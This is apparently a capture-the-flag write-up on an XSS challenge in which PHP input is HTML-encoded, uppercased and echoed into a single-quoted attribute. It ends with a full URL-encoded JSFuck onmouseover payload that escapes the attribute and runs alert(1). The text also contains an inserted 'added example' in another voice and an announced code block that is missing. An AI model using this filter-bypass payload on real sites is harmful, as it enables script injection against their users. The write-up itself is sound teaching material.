No String Attached XSS

Greetings fellas, I was doing a CTF challenge on https://www.contextis.com/careers/challenges/web-application. It was about XSS, so here is the code you need to break:

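<?php

// Challenge code: user input is HTML-encoded, uppercased, then echoed into a single-quoted attribute.

$NAME=$_GET['name'];

$NAMESAN=strtoupper(htmlspecialchars($NAME));

echo "<HTML><body>";

echo '<form action="">';

// $NAMESAN lands inside value='...'

echo "First name: <input type='text' name='name' value='".$NAMESAN."'><br>";

echo "<input type='submit' value='Submit form'></form>";

echo "</HTML></body>";

?>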

You can't use '<' and '>' because of the htmlspecialchars() function, so I will go with a JavaScript event-handler kind of attack, you know, an onclick or onmouseover kind of vector.

First I'm going to use a ' to get out of the value attribute and see the effect.
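
Why the single quote gets through, as an added example (not the challenge's code or the author's): ENT_COMPAT, the htmlspecialchars() default before PHP 8.1, leaves ' unencoded, so a value='...' attribute can be closed from the input. render_hardened(), attribute_names() and the inert data-probe input are assumptions made for this illustration.

```php
<?php
// Added example. render_weak() mirrors the page's encoding step;
// render_hardened() and attribute_names() are hypothetical helpers.

function render_weak(string $name): string {
    // ENT_COMPAT (default before PHP 8.1) encodes < > & " but not '.
    $san = strtoupper(htmlspecialchars($name, ENT_COMPAT, 'UTF-8'));
    return "<input type='text' name='name' value='" . $san . "'>";
}

function render_hardened(string $name): string {
    // Transform first, encode last, and encode both quote styles.
    $san = htmlspecialchars(strtoupper($name), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="name" value="' . $san . '">';
}

// Parse the markup and list the attributes the <input> really ends up with.
function attribute_names(string $html): array {
    libxml_use_internal_errors(true); // keep parser warnings out of the output
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    $input = $doc->getElementsByTagName('input')->item(0);
    $names = [];
    foreach ($input->attributes as $attr) {
        $names[] = strtolower($attr->nodeName);
    }
    return $names;
}

// Constructed, inert probe: a quote followed by a harmless data- attribute.
$probe = "' data-probe='x";

$cases = ['weak' => render_weak($probe), 'hardened' => render_hardened($probe)];
foreach ($cases as $label => $html) {
    $names = attribute_names($html);
    $broke = in_array('data-probe', $names, true);
    echo $label . ': ' . $html . "\n";
    echo '  attributes: ' . implode(', ', $names) . "\n";
    echo '  ' . ($broke ? 'input broke out of value' : 'input stayed inside value') . "\n";
}
```

The uppercasing step does not stop the breakout, because HTML attribute names are case-insensitive; only encoding the quote character does.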

I tried ' onclick=alert(1); but the crap function strtoupper capitalized my input and made it unusable.

Basically, whatever letters I typed, it was going to change them into uppercase.

After bashing my head against different web pages, I found something incredibly well built and awesome. The thing is JSFuck, yeah!!!!!

JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.

Are you kidding? Only 6 characters to write JavaScript? Grossssss.

So in JSFuck, this is how alert(1); looks:

Geez, Christ!!!!!! Time to see the magic.

Remember to replace + with its URL-encoded equivalent %2b, so the final attack vector is:

‘ onmouseover='[][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]][([][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(!![]%2b[])[%2b!%2b[]]]((![]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(![]%2b[][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]])[!%2b[]%2b!%2b[]%2b[%2b[]]]%2b[%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]])[!%2b[]%2b!%2b[]%2b[%2b[]]])()

 

 
